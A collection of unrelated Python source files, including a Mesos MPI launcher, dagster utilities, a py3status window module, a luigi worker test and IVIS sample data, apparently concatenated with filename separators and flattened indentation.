formatter = Formatter('%(asctime)s.%(msecs)03d %(name)-20s '
'%(message)s', '%H:%M:%S')
else:
formatter = Formatter('%(message)s')
FtdiLogger.set_formatter(formatter)
FtdiLogger.set_level(loglevel)
FtdiLogger.log.addHandler(StreamHandler(stderr))
if args.virtual:
from pyftdi.usbtools import UsbTools
# Force PyUSB to use PyFtdi test framework for USB backends
UsbTools.BACKENDS = ('pyftdi.tests.backend.usbvirt', )
# Ensure the virtual backend can be found and is loaded
backend = UsbTools.find_backend()
loader = backend.create_loader()()
loader.load(args.virtual)
try:
add_custom_devices(Ftdi, args.vidpid)
except ValueError as exc:
argparser.error(str(exc))
miniterm = MiniTerm(device=args.device,
baudrate=to_bps(args.baudrate),
parity='N',
rtscts=args.hwflow,
debug=args.debug)
miniterm.run(args.fullmode, args.loopback, args.silent, args.localecho,
args.crlf)
except (IOError, ValueError) as exc:
print('\nError: %s' % exc, file=stderr)
if debug:
print(format_exc(chain=False), file=stderr)
sysexit(1)
except KeyboardInterrupt:
sysexit(2)
if __name__ == '__main__':
main()
|
event.py | #!/usr/bin/env python
# -*- coding:UTF-8 -*-
import threading
import time
event=threading.Event()
def func():
#等待事件,进入等待阻塞状态
print'%s wait for event...'%threading.currentThread().getName()
event.wait()
#收到事件后进入运行状态
print'%s recv event.'% threading.currentThread().getName()
t1=threading.Thread(target=func)
t2=threading.Thread(target=func)
t1.start()
t2.start()
time.sleep(2)
#发送事件通知
print'MainThread set event.'
event.set()
|
mrun.py | #!/usr/bin/env python
import mesos.native
import mesos.interface
from mesos.interface import mesos_pb2
import os
import logging
import re
import sys
import time
import math
import threading
import socket
import time
import tempfile
from optparse import OptionParser
from subprocess import *
def printOutput(p):
for line in p.stdout:
print line,
def startMPIExec(procs, slaves, program):
os.symlink(os.getcwd() + '/export', work_dir + "/export")
os.chdir(work_dir)
hosts = ",".join(slaves)
cmd = ["./export/bin/mpiexec.hydra", "-genv", "LD_LIBRARY_PATH", work_dir + "/libs", "-launcher", "manual", "-n", str(procs), "-hosts", str(hosts)]
cmd.extend(program)
p = Popen(cmd, stdout=PIPE)
proxy_args = []
while True:
line = p.stdout.readline()
if line == 'HYDRA_LAUNCH_END\n':
break
proxy_args.append(line)
# Print rest MPI output.
t = threading.Thread(target=printOutput, args=([p]))
t.start()
return proxy_args
def finalizeSlaves(callbacks):
time.sleep(1)
logging.info("Finalize slaves")
hosts = []
for slave in callbacks:
hosts.append(slave[0])
proxy_args = startMPIExec(total_procs, hosts, mpi_program)
proxy_id = 0
for slave in callbacks:
chost = slave[0]
cport = int(slave[1])
proxy_arg = proxy_args[proxy_id]
proxy_id += 1
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((chost, cport))
request = work_dir + ";" + proxy_arg
s.send(request)
s.close()
# TODO(nnielsen): Add retry logic; slave might not be listening yet.
logging.info("Done finalizing slaves")
class HydraScheduler(mesos.interface.Scheduler):
def __init__(self, options):
self.proxiesLaunched = 0
self.proxiesRunning = 0
self.proxiesFinished = 0
self.options = options
self.startedExec = False
self.slaves = set()
self.callbacks = []
self.finalizeTriggered = False
def registered(self, driver, fid, masterInfo):
logging.info("Registered with framework ID %s" % fid.value)
def resourceOffers(self, driver, offers):
for offer in offers:
if self.proxiesLaunched == total_nodes:
driver.declineOffer(offer.id)
continue
cpus = 0
mem = 0
tasks = []
if offer.hostname in self.slaves:
logging.info("Declining offer: offer from slave already scheduled")
for resource in offer.resources:
if resource.name == "cpus":
cpus = resource.scalar.value
elif resource.name == "mem":
mem = resource.scalar.value
elif resource.name == "ports":
port = resource.ranges.range[0].begin
if cpus < cores_per_node or mem < mem_per_node:
logging.info("Declining offer due to too few resources")
driver.declineOffer(offer.id)
else:
tid = self.proxiesLaunched
self.proxiesLaunched += 1
logging.info("Launching proxy on offer %s from %s" % (offer.id, offer.hostname))
task = mesos_pb2.TaskInfo()
task.task_id.value = str(tid)
task.slave_id.value = offer.slave_id.value
task.name = "task %d " % tid
cpus = task.resources.add()
cpus.name = "cpus"
cpus.type = mesos_pb2.Value.SCALAR
cpus.scalar.value = cores_per_node
mem = task.resources.add()
mem.name = "mem"
mem.type = mesos_pb2.Value.SCALAR
mem.scalar.value = mem_per_node
ports = task.resources.add()
ports.name = "ports"
ports.type = mesos_pb2.Value.RANGES
r = ports.ranges.range.add()
r.begin = port
r.end = port
lib = task.command.environment.variables.add()
lib.name = "LD_LIBRARY_PATH"
lib.value = work_dir + "/libs"
hydra_uri = task.command.uris.add()
hydra_uri.value = "file://" + nfs_path + "/hydra/hydra.tgz"
executable_uri = task.command.uris.add()
executable_uri.value = "file://" + nfs_path + "/hydra/" + mpi_program[0]
task.command.value = "python hydra-proxy.py %d" % port
tasks.append(task)
logging.info("Replying to offer: launching proxy %d on host %s" % (tid, offer.hostname))
logging.info("Call-back at %s:%d" % (offer.hostname, port))
self.callbacks.append([offer.hostname, port])
self.slaves.add(offer.hostname)
driver.launchTasks(offer.id, tasks)
def statusUpdate(self, driver, update):
if (update.state == mesos_pb2.TASK_FAILED or
update.state == mesos_pb2.TASK_KILLED or
update.state == mesos_pb2.TASK_LOST):
logging.error("A task finished unexpectedly: " + update.message)
driver.stop()
if (update.state == mesos_pb2.TASK_RUNNING):
self.proxiesRunning += 1
# Trigger real launch when threshold is met.
if self.proxiesRunning >= total_nodes and not self.finalizeTriggered:
self.finalizeTriggered = True
threading.Thread(target = finalizeSlaves, args = ([self.callbacks])).start()
if (update.state == mesos_pb2.TASK_FINISHED):
self.proxiesFinished += 1
if self.proxiesFinished == total_nodes:
logging.info("All processes done, exiting")
driver.stop()
def offerRescinded(self, driver, offer_id):
logging.info("Offer %s rescinded" % offer_id)
if __name__ == "__main__":
parser = OptionParser(usage="Usage: %prog [options] mesos_master mpi_program")
parser.disable_interspersed_args()
parser.add_option("-N", "--nodes",
help="number of nodes to run processes (default 1)",
dest="nodes", type="int", default=1)
parser.add_option("-n", "--num",
help="total number of MPI processes (default 1)",
dest="procs", type="int", default=1)
parser.add_option("-c", "--cpus-per-task",
help="number of cores per MPI process (default 1)",
dest="cores", type="int", default=1)
parser.add_option("-m","--mem",
help="number of MB of memory per MPI process (default 1GB)",
dest="mem", type="int", default=1024)
parser.add_option("--proxy",
help="url to proxy binary", dest="proxy", type="string")
parser.add_option("--name",
help="framework name", dest="name", type="string")
parser.add_option("--nfs",
help="NFS path", dest="nfs_path", type="string")
parser.add_option("-p","--path",
help="path to look for MPICH2 binaries (mpiexec)",
dest="path", type="string", default="")
parser.add_option("-v", action="store_true", dest="verbose")
# Add options to configure cpus and mem.
(options,args) = parser.parse_args()
if len(args) < 2:
print >> sys.stderr, "At least two parameters required."
print >> sys.stderr, "Use --help to show usage."
exit(2)
if options.verbose == True:
logging.basicConfig(level=logging.INFO)
total_procs = options.procs
total_nodes = options.nodes
cores = options.cores
procs_per_node = math.ceil(total_procs / total_nodes)
cores_per_node = procs_per_node * cores
mem_per_node = options.mem
mpi_program = args[1:]
nfs_path = options.nfs_path
if nfs_path == None:
nfs_path = os.environ.get("NFS_PATH")
if nfs_path == None:
print >> sys.stderr, "NFS path required."
exit(2)
logging.info("Connecting to Mesos master %s" % args[0])
logging.info("Total processes %d" % total_procs)
logging.info("Total nodes %d" % total_nodes)
logging.info("Procs per node %d" % procs_per_node)
logging.info("Cores per node %d" % cores_per_node)
scheduler = HydraScheduler(options)
framework = mesos_pb2.FrameworkInfo()
framework.user = ""
if options.name is not None:
framework.name = options.name
else:
framework.name = "MPICH2 Hydra : %s" % mpi_program[0]
work_dir = tempfile.mkdtemp()
driver = mesos.native.MesosSchedulerDriver(
scheduler,
framework,
args[0])
sys.exit(0 if driver.run() == mesos_pb2.DRIVER_STOPPED else 1)
|
keep_alive.py | from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
return "Hello. I am alive!"
def run():
app.run(host='0.0.0.0',port=8000)
def keep_alive():
t = Thread(target=run)
t.start() |
__init__.py | import contextlib
import datetime
import errno
import functools
import inspect
import os
import pickle
import re
import signal
import socket
import subprocess
import sys
import tempfile
import threading
from collections import namedtuple
from enum import Enum
from warnings import warn
import six
import yaml
from dagster import check, seven
from dagster.core.errors import DagsterExecutionInterruptedError, DagsterInvariantViolationError
from dagster.seven import IS_WINDOWS, TemporaryDirectory, multiprocessing, thread
from dagster.seven.abc import Mapping
from six.moves import configparser
from .merger import merge_dicts
from .yaml_utils import load_yaml_from_glob_list, load_yaml_from_globs, load_yaml_from_path
if sys.version_info > (3,):
from pathlib import Path # pylint: disable=import-error
else:
from pathlib2 import Path # pylint: disable=import-error
EPOCH = datetime.datetime.utcfromtimestamp(0)
PICKLE_PROTOCOL = 4
DEFAULT_REPOSITORY_YAML_FILENAME = "repository.yaml"
DEFAULT_WORKSPACE_YAML_FILENAME = "workspace.yaml"
def file_relative_path(dunderfile, relative_path):
"""
This function is useful when one needs to load a file that is
relative to the position of the current file. (Such as when
you encode a configuration file path in source file and want
in runnable in any current working directory)
It is meant to be used like the following:
file_relative_path(__file__, 'path/relative/to/file')
"""
check.str_param(dunderfile, "dunderfile")
check.str_param(relative_path, "relative_path")
return os.path.join(os.path.dirname(dunderfile), relative_path)
def script_relative_path(file_path):
"""
Useful for testing with local files. Use a path relative to where the
test resides and this function will return the absolute path
of that file. Otherwise it will be relative to script that
ran the test
Note: this is function is very, very expensive (on the order of 1
millisecond per invocation) so this should only be used in performance
insensitive contexts. Prefer file_relative_path for anything with
performance constraints.
"""
# from http://bit.ly/2snyC6s
check.str_param(file_path, "file_path")
scriptdir = inspect.stack()[1][1]
return os.path.abspath(os.path.join(os.path.dirname(os.path.abspath(scriptdir)), file_path))
# Adapted from https://github.com/okunishinishi/python-stringcase/blob/master/stringcase.py
def camelcase(string):
check.str_param(string, "string")
string = re.sub(r"^[\-_\.]", "", str(string))
if not string:
return string
return str(string[0]).upper() + re.sub(
r"[\-_\.\s]([a-z])", lambda matched: str(matched.group(1)).upper(), string[1:]
)
def ensure_single_item(ddict):
check.dict_param(ddict, "ddict")
check.param_invariant(len(ddict) == 1, "ddict", "Expected dict with single item")
return list(ddict.items())[0]
@contextlib.contextmanager
def pushd(path):
old_cwd = os.getcwd()
os.chdir(path)
try:
yield path
finally:
os.chdir(old_cwd)
def safe_isfile(path):
""""Backport of Python 3.8 os.path.isfile behavior.
This is intended to backport https://docs.python.org/dev/whatsnew/3.8.html#os-path. I'm not
sure that there are other ways to provoke this behavior on Unix other than the null byte,
but there are certainly other ways to do it on Windows. Afaict, we won't mask other
ValueErrors, and the behavior in the status quo ante is rough because we risk throwing an
unexpected, uncaught ValueError from very deep in our logic.
"""
try:
return os.path.isfile(path)
except ValueError:
return False
def mkdir_p(path):
try:
os.makedirs(path)
return path
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
class frozendict(dict):
def __readonly__(self, *args, **kwargs):
raise RuntimeError("Cannot modify ReadOnlyDict")
# https://docs.python.org/3/library/pickle.html#object.__reduce__
#
# For a dict, the default behavior for pickle is to iteratively call __setitem__ (see 5th item
# in __reduce__ tuple). Since we want to disable __setitem__ and still inherit dict, we
# override this behavior by defining __reduce__. We return the 3rd item in the tuple, which is
# passed to __setstate__, allowing us to restore the frozendict.
def __reduce__(self):
return (frozendict, (), dict(self))
def __setstate__(self, state):
self.__init__(state)
__setitem__ = __readonly__
__delitem__ = __readonly__
pop = __readonly__
popitem = __readonly__
clear = __readonly__
update = __readonly__
setdefault = __readonly__
del __readonly__
class frozenlist(list):
def __readonly__(self, *args, **kwargs):
raise RuntimeError("Cannot modify ReadOnlyList")
# https://docs.python.org/3/library/pickle.html#object.__reduce__
#
# Like frozendict, implement __reduce__ and __setstate__ to handle pickling.
# Otherwise, __setstate__ will be called to restore the frozenlist, causing
# a RuntimeError because frozenlist is not mutable.
def __reduce__(self):
return (frozenlist, (), list(self))
def __setstate__(self, state):
self.__init__(state)
__setitem__ = __readonly__
__delitem__ = __readonly__
append = __readonly__
clear = __readonly__
extend = __readonly__
insert = __readonly__
pop = __readonly__
remove = __readonly__
reverse = __readonly__
sort = __readonly__
def __hash__(self):
return hash(tuple(self))
def make_readonly_value(value):
if isinstance(value, list):
return frozenlist(list(map(make_readonly_value, value)))
elif isinstance(value, dict):
return frozendict({key: make_readonly_value(value) for key, value in value.items()})
else:
return value
def get_prop_or_key(elem, key):
if isinstance(elem, Mapping):
return elem.get(key)
else:
return getattr(elem, key)
def list_pull(alist, key):
return list(map(lambda elem: get_prop_or_key(elem, key), alist))
def all_none(kwargs):
for value in kwargs.values():
if value is not None:
return False
return True
def check_script(path, return_code=0):
try:
subprocess.check_output([sys.executable, path])
except subprocess.CalledProcessError as exc:
if return_code != 0:
if exc.returncode == return_code:
return
raise
def check_cli_execute_file_pipeline(path, pipeline_fn_name, env_file=None):
from dagster.core.test_utils import instance_for_test
with instance_for_test():
cli_cmd = [
sys.executable,
"-m",
"dagster",
"pipeline",
"execute",
"-f",
path,
"-a",
pipeline_fn_name,
]
if env_file:
cli_cmd.append("-c")
cli_cmd.append(env_file)
try:
subprocess.check_output(cli_cmd)
except subprocess.CalledProcessError as cpe:
print(cpe) # pylint: disable=print-call
raise cpe
def safe_tempfile_path_unmanaged():
# This gets a valid temporary file path in the safest possible way, although there is still no
# guarantee that another process will not create a file at this path. The NamedTemporaryFile is
# deleted when the context manager exits and the file object is closed.
#
# This is preferable to using NamedTemporaryFile as a context manager and passing the name
# attribute of the file object around because NamedTemporaryFiles cannot be opened a second time
# if already open on Windows NT or later:
# https://docs.python.org/3.8/library/tempfile.html#tempfile.NamedTemporaryFile
# https://github.com/dagster-io/dagster/issues/1582
with tempfile.NamedTemporaryFile() as fd:
path = fd.name
return Path(path).as_posix()
@contextlib.contextmanager
def safe_tempfile_path():
try:
path = safe_tempfile_path_unmanaged()
yield path
finally:
if os.path.exists(path):
os.unlink(path)
def ensure_gen(thing_or_gen):
if not inspect.isgenerator(thing_or_gen):
def _gen_thing():
yield thing_or_gen
return _gen_thing()
return thing_or_gen
def ensure_dir(file_path):
try:
os.makedirs(file_path)
except OSError as e:
if e.errno != errno.EEXIST:
raise
def ensure_file(path):
ensure_dir(os.path.dirname(path))
if not os.path.exists(path):
touch_file(path)
def touch_file(path):
ensure_dir(os.path.dirname(path))
with open(path, "a"):
os.utime(path, None)
def _kill_on_event(termination_event):
termination_event.wait()
send_interrupt()
def send_interrupt():
if IS_WINDOWS:
# This will raise a KeyboardInterrupt in python land - meaning this wont be able to
# interrupt things like sleep()
thread.interrupt_main()
else:
# If on unix send an os level signal to interrupt any situation we may be stuck in
os.kill(os.getpid(), signal.SIGINT)
# Function to be invoked by daemon thread in processes which seek to be cancellable.
# The motivation for this approach is to be able to exit cleanly on Windows. An alternative
# path is to change how the processes are opened and send CTRL_BREAK signals, which at
# the time of authoring seemed a more costly approach.
#
# Reading for the curious:
# * https://stackoverflow.com/questions/35772001/how-to-handle-the-signal-in-python-on-windows-machine
# * https://stefan.sofa-rockers.org/2013/08/15/handling-sub-process-hierarchies-python-linux-os-x/
def start_termination_thread(termination_event):
check.inst_param(termination_event, "termination_event", ttype=type(multiprocessing.Event()))
int_thread = threading.Thread(
target=_kill_on_event, args=(termination_event,), name="kill-on-event"
)
int_thread.daemon = True
int_thread.start()
# Executes the next() function within an instance of the supplied context manager class
# (leaving the context before yielding each result)
def iterate_with_context(context, iterator):
while True:
# Allow interrupts during user code so that we can terminate slow/hanging steps
with context():
try:
next_output = next(iterator)
except StopIteration:
return
yield next_output
def datetime_as_float(dt):
check.inst_param(dt, "dt", datetime.datetime)
return float((dt - EPOCH).total_seconds())
# hashable frozen string to string dict
class frozentags(frozendict):
def __init__(self, *args, **kwargs):
super(frozentags, self).__init__(*args, **kwargs)
check.dict_param(self, "self", key_type=str, value_type=str)
def __hash__(self):
return hash(tuple(sorted(self.items())))
def updated_with(self, new_tags):
check.dict_param(new_tags, "new_tags", key_type=str, value_type=str)
updated = dict(self)
for key, value in new_tags.items():
updated[key] = value
return frozentags(updated)
class EventGenerationManager:
""" Utility class that wraps an event generator function, that also yields a single instance of
a typed object. All events yielded before the typed object are yielded through the method
`generate_setup_events` and all events yielded after the typed object are yielded through the
method `generate_teardown_events`.
This is used to help replace the context managers used in pipeline initialization with
generators so that we can begin emitting initialization events AND construct a pipeline context
object, while managing explicit setup/teardown.
This does require calling `generate_setup_events` AND `generate_teardown_events` in order to
get the typed object.
"""
def __init__(self, generator, object_cls, require_object=True):
self.generator = check.generator(generator)
self.object_cls = check.type_param(object_cls, "object_cls")
self.require_object = check.bool_param(require_object, "require_object")
self.object = None
self.did_setup = False
self.did_teardown = False
def generate_setup_events(self):
self.did_setup = True
try:
while self.object is None:
obj = next(self.generator)
if isinstance(obj, self.object_cls):
self.object = obj
else:
yield obj
except StopIteration:
if self.require_object:
check.inst_param(
self.object,
"self.object",
self.object_cls,
"generator never yielded object of type {}".format(self.object_cls.__name__),
)
def get_object(self):
if not self.did_setup:
check.failed("Called `get_object` before `generate_setup_events`")
return self.object
def generate_teardown_events(self):
self.did_teardown = True
if self.object:
yield from self.generator
def utc_datetime_from_timestamp(timestamp):
tz = None
if sys.version_info.major >= 3 and sys.version_info.minor >= 2:
from datetime import timezone
tz = timezone.utc
else:
import pytz
tz = pytz.utc
return datetime.datetime.fromtimestamp(timestamp, tz=tz)
def is_enum_value(value):
return False if value is None else issubclass(value.__class__, Enum)
def git_repository_root():
return six.ensure_str(subprocess.check_output(["git", "rev-parse", "--show-toplevel"]).strip())
def segfault():
"""Reliable cross-Python version segfault.
https://bugs.python.org/issue1215#msg143236
"""
import ctypes
ctypes.string_at(0)
def find_free_port():
with contextlib.closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
s.bind(("", 0))
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
return s.getsockname()[1]
@contextlib.contextmanager
def alter_sys_path(to_add, to_remove):
to_restore = [path for path in sys.path]
# remove paths
for path in to_remove:
if path in sys.path:
sys.path.remove(path)
# add paths
for path in to_add:
sys.path.insert(0, path)
try:
yield
finally:
sys.path = to_restore
@contextlib.contextmanager
def restore_sys_modules():
sys_modules = {k: v for k, v in sys.modules.items()}
try:
yield
finally:
to_delete = set(sys.modules) - set(sys_modules)
for key in to_delete:
del sys.modules[key]
def process_is_alive(pid):
if IS_WINDOWS:
import psutil # pylint: disable=import-error
return psutil.pid_exists(pid=pid)
else:
try:
subprocess.check_output(["ps", str(pid)])
except subprocess.CalledProcessError as exc:
assert exc.returncode == 1
return False
return True
def compose(*args):
"""
Compose python functions args such that compose(f, g)(x) is equivalent to f(g(x)).
"""
# reduce using functional composition over all the arguments, with the identity function as
# initializer
return functools.reduce(lambda f, g: lambda x: f(g(x)), args, lambda x: x)
def dict_without_keys(ddict, *keys):
return {key: value for key, value in ddict.items() if key not in set(keys)}
|
window.py | # -*- coding: utf-8 -*-
"""
Display window properties (i.e. title, class, instance).
Configuration parameters:
cache_timeout: refresh interval for i3-msg or swaymsg (default 0.5)
format: display format for this module (default "{title}")
hide_title: hide title on containers with window title (default False)
max_width: specify width to truncate title with ellipsis (default None)
Format placeholders:
{class} window class
{instance} window instance
{title} window title
Optional:
i3ipc: an improved python library to control i3wm and sway
Examples:
```
# show alternative instead of empty title
window_title {
format = '{title}|\u2665'
}
```
@author shadowprince (counter), Anon1234 (async)
@license Eclipse Public License (counter), BSD (async)
SAMPLE OUTPUT
{'full_text': u'scary snake movie - mpv'}
ellipsis
{'full_text': u'GitHub - ultrabug/py3sta…'}
"""
STRING_ERROR = "invalid ipc `{}`"
class Ipc:
"""
"""
def __init__(self, parent):
self.parent = parent
self.setup(parent)
def compatibility(self, window_properties):
# specify width to truncate title with ellipsis
if self.parent.max_width:
title = window_properties["title"]
if len(title or "") > self.parent.max_width:
window_properties["title"] = title[: self.parent.max_width - 1] + u"…"
return window_properties
class I3ipc(Ipc):
"""
i3ipc - an improved python library to control i3wm and sway
"""
def setup(self, parent):
from threading import Thread
self.parent.cache_timeout = self.parent.py3.CACHE_FOREVER
self.window_properties = {}
t = Thread(target=self.start)
t.daemon = True
t.start()
def start(self):
from i3ipc import Connection
i3 = Connection()
self.change_title(i3)
for event in ["workspace::focus", "window::close"]:
i3.on(event, self.clear_title)
for event in ["window::title", "window::focus", "binding"]:
i3.on(event, self.change_title)
i3.main()
def clear_title(self, i3, event=None):
self.update(i3.get_tree().find_focused())
def change_title(self, i3, event=None):
focused = i3.get_tree().find_focused()
# hide title on containers with window title
if self.parent.hide_title:
if (
focused.border == "normal"
or focused.type == "workspace"
or (
focused.parent.layout in ("stacked", "tabbed")
and len(focused.parent.nodes) > 1
)
):
focused.window_title = None
self.update(focused)
def update(self, window_properties):
window_properties = {
"title": window_properties.window_title,
"class": window_properties.window_class,
"instance": window_properties.window_instance,
}
window_properties = self.compatibility(window_properties)
if self.window_properties != window_properties:
self.window_properties = window_properties
self.parent.py3.update()
def get_window_properties(self):
return self.window_properties
class Msg(Ipc):
"""
i3-msg - send messages to i3 window manager
swaymsg - send messages to sway window manager
"""
def setup(self, parent):
from json import loads as json_loads
self.json_loads = json_loads
wm_msg = {"i3msg": "i3-msg"}.get(parent.ipc, parent.ipc)
self.tree_command = [wm_msg, "-t", "get_tree"]
def get_window_properties(self):
tree = self.json_loads(self.parent.py3.command_output(self.tree_command))
focused = self.find_needle(tree)
window_properties = focused.get(
"window_properties", {"title": None, "class": None, "instance": None}
)
# hide title on containers with window title
if self.parent.hide_title:
parent = self.find_needle(tree, focused)
if (
focused["border"] == "normal"
or focused["type"] == "workspace"
or (
parent["layout"] in ("stacked", "tabbed")
and len(parent["nodes"]) > 1
)
):
window_properties["title"] = None
window_properties = self.compatibility(window_properties)
return window_properties
def find_needle(self, tree, focused=None):
if isinstance(tree, list):
for el in tree:
res = self.find_needle(el, focused)
if res:
return res
elif isinstance(tree, dict):
nodes = tree["nodes"] + tree["floating_nodes"]
if focused:
for node in nodes:
if node["id"] == focused["id"]:
return tree
elif tree["focused"]:
return tree
return self.find_needle(nodes, focused)
return {}
class Py3status:
"""
"""
# available configuration parameters
cache_timeout = 0.5
format = "{title}"
hide_title = False
max_width = None
def post_config_hook(self):
# ipc: specify i3ipc, i3-msg, or swaymsg, otherwise auto
self.ipc = getattr(self, "ipc", "")
if self.ipc in ["", "i3ipc"]:
try:
from i3ipc import Connection # noqa f401, auto ipc
self.ipc = "i3ipc"
except Exception:
if self.ipc:
raise # module not found
self.ipc = (self.ipc or self.py3.get_wm_msg()).replace("-", "")
if self.ipc in ["i3ipc"]:
self.backend = I3ipc(self)
elif self.ipc in ["i3msg", "swaymsg"]:
self.backend = Msg(self)
else:
raise Exception(STRING_ERROR.format(self.ipc))
def window(self):
window_properties = self.backend.get_window_properties()
return {
"cached_until": self.py3.time_in(self.cache_timeout),
"full_text": self.py3.safe_format(self.format, window_properties),
}
if __name__ == "__main__":
"""
Specify --ipc [i3ipc|i3msg|swaymsg].
"""
from sys import argv
config = {"format": "\[{ipc}\] [\?color=pink {title}]"}
for index, arg in enumerate(argv):
if "--ipc" in arg:
config["ipc"] = argv[index + 1]
"""
Run module in test mode.
"""
from py3status.module_test import module_test
module_test(Py3status, config=config)
|
worker_keep_alive_test.py | # -*- coding: utf-8 -*-
#
# Copyright 2016 VNG Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from helpers import LuigiTestCase
from luigi.scheduler import Scheduler
from luigi.worker import Worker
import luigi
import threading
class WorkerKeepAliveUpstreamTest(LuigiTestCase):
"""
Tests related to how the worker stays alive after upstream status changes.
See https://github.com/spotify/luigi/pull/1789
"""
def run(self, result=None):
"""
Common setup code. Due to the contextmanager cant use normal setup
"""
self.sch = Scheduler(retry_delay=0.00000001, retry_count=2)
with Worker(scheduler=self.sch, worker_id='X', keep_alive=True, wait_interval=0.1, wait_jitter=0) as w:
self.w = w
super(WorkerKeepAliveUpstreamTest, self).run(result)
def test_alive_while_has_failure(self):
"""
One dependency disables and one fails
"""
class Disabler(luigi.Task):
pass
class Failer(luigi.Task):
did_run = False
def run(self):
self.did_run = True
class Wrapper(luigi.WrapperTask):
def requires(self):
return (Disabler(), Failer())
self.w.add(Wrapper())
disabler = Disabler().task_id
failer = Failer().task_id
self.sch.add_task(disabler, 'FAILED', worker='X')
self.sch.prune() # Make scheduler unfail the disabled task
self.sch.add_task(disabler, 'FAILED', worker='X') # Disable it
self.sch.add_task(failer, 'FAILED', worker='X') # Fail it
try:
t = threading.Thread(target=self.w.run)
t.start()
t.join(timeout=1) # Wait 1 second
self.assertTrue(t.is_alive()) # It shouldn't stop trying, the failed task should be retried!
self.assertFalse(Failer.did_run) # It should never have run, the cooldown is longer than a second.
finally:
self.sch.prune() # Make it, like die. Couldn't find a more forceful way to do this.
t.join(timeout=1) # Wait 1 second
assert not t.is_alive()
def test_alive_while_has_success(self):
"""
One dependency disables and one succeeds
"""
# TODO: Fix copy paste mess
class Disabler(luigi.Task):
pass
class Succeeder(luigi.Task):
did_run = False
def run(self):
self.did_run = True
class Wrapper(luigi.WrapperTask):
def requires(self):
return (Disabler(), Succeeder())
self.w.add(Wrapper())
disabler = Disabler().task_id
succeeder = Succeeder().task_id
self.sch.add_task(disabler, 'FAILED', worker='X')
self.sch.prune() # Make scheduler unfail the disabled task
self.sch.add_task(disabler, 'FAILED', worker='X') # Disable it
self.sch.add_task(succeeder, 'DONE', worker='X') # Fail it
try:
t = threading.Thread(target=self.w.run)
t.start()
t.join(timeout=1) # Wait 1 second
self.assertFalse(t.is_alive()) # The worker should think that it should stop ...
# ... because in this case the only work remaining depends on DISABLED tasks,
# hence it's not worth considering the wrapper task as a PENDING task to
# keep the worker alive anymore.
self.assertFalse(Succeeder.did_run) # It should never have run, it succeeded already
finally:
self.sch.prune() # This shouldnt be necessary in this version, but whatevs
t.join(timeout=1) # Wait 1 second
assert not t.is_alive()
|
ivis_data.py | """
Contains samples of IVIS requests and responses used for testing the IVIS interface
"""
SAMPLE_JOB_ID = "job1"
SAMPLE_JOB_INTERVAL = 10
SAMPLE_JOB_PARAMETERS = '''
[
{
"id": "sigSet",
"label": "Signal Set",
"type": "signalSet"
},
{
"id": "ts_signal",
"label": "TS signal",
"type": "signal",
"signalSetRef": "sigSet"
},
{
"id": "source_signal",
"label": "Source signal",
"type": "signal",
"signalSetRef": "sigSet"
},
{
"id": "window",
"label": "Window",
"type": "string"
}
]
'''
'''
[
{
"id": "dataset",
"label": "Dataset",
"type": "string"
}
]
'''
SAMPLE_JOB_CONFIG = '''
{
"params": {
"sigSet": "example_set",
"ts_signal": "ts",
"source_signal": "source",
"window": 4
},
"entities": {
"signalSets": {
"example_set": {
"index": "signal_set_1",
"name": "Example set",
"namespace": 1
}
},
"signals": {
"example_set": {
"source": {
"field": "s1",
"name": "Source of values",
"namespace": 1
},
"ts": {
"field": "s2",
"name": "Timestamp",
"namespace": 1
}
}
}
},
"state": null,
"es": {
"host": "localhost",
"port": "9200"
}
}
'''
SAMPLE_JOB_STATE = """
{
"index": "signal_set_2",
"type": "_doc",
"fields": {
"mean": "s3"
},
"last": 1.234,
"values": [1, 2, 3, 4]
}
"""
"""
{"params": {"dataset": "ds1"}}
"""
SAMPLE_JOB_CREATE_SS_REQUEST = '''
{
"type": "sets",
"sigSet": {
"cid" : "moving_average",
"name" : "moving average" ,
"namespace": 1,
"description" : "moving average" ,
"aggs": "0",
"signals": [
{
"cid": "mean",
"name": "mean",
"description": "mean",
"namespace": 1,
"type": "raw_double",
"indexed": false,
"settings": {}
}
]
}
}
'''
SAMPLE_JOB_CREATE_SS_RESPONSE = '''
{
"index": "signal_set_2",
"type": "_doc",
"fields": {
"mean": "s3"
}
}
'''
'''
{
"id": 1,
"type": "store",
"state": {
"index": "signal_set_2",
"type": "_doc",
"fields": {
"created_signal": "s3"
}
}
}
'''
'''
{
settings: { params: [], jsx: "'use strict';\n", scss: '' },
name: 'tmp',
elevated_access: 1,
type: 'jsx',
namespace: 1,
description: '',
originalHash: '7ea1949a41c2b0c3ddd392f5721234ccb6e879733f37b7e95738d98c5e7cd813',
id: 1
}
'''
SAMPLE_JOB_CODE = '''
standalone = False
if standalone:
from cloud_controller.middleware.helpers import setup_logging
from cloud_controller.middleware.ivis_pb2 import RunRequest
from cloud_controller.ivis.ivis_mock import IvisCoreMock
from cloud_controller.ivis.ivis_data import SAMPLE_JOB_CONFIG
setup_logging()
ivis_core = IvisCoreMock()
from threading import RLock, Thread
from time import perf_counter, sleep
from typing import Dict, List
class Elasticsearch:
def __init__(self, config):
print(f"Connected to Elastic Search at {config[0]['host']}:{config[0]['port']}")
self.items: List[Dict[str, Dict]] = []
self.means: List[Dict[str, float]] = []
self.last_index = 0
self.last_value = 0
self.lock = RLock()
for i in range(10):
self.add_next_item()
self.generator_thread = Thread(target=self.generator, args=(), daemon=True)
self.generator_thread.start()
def get_new_items(self):
with self.lock:
previous_index = self.last_index
self.last_index = len(self.items)
return self.items[previous_index:self.last_index]
def add_next_item(self):
self.last_value += 1
with self.lock:
self.items.append(
{
"_source": {
"s1": self.last_value,
"s2": perf_counter()
}
}
)
def generator(self):
while True:
self.add_next_item()
sleep(2)
def index(self, index, doc_type, body):
self.means.append(body)
class helpers:
@staticmethod
def scan(es: Elasticsearch, preserve_order: bool, query, index: str) -> List[Dict[str, Dict]]:
# if 'range' in query['query']:
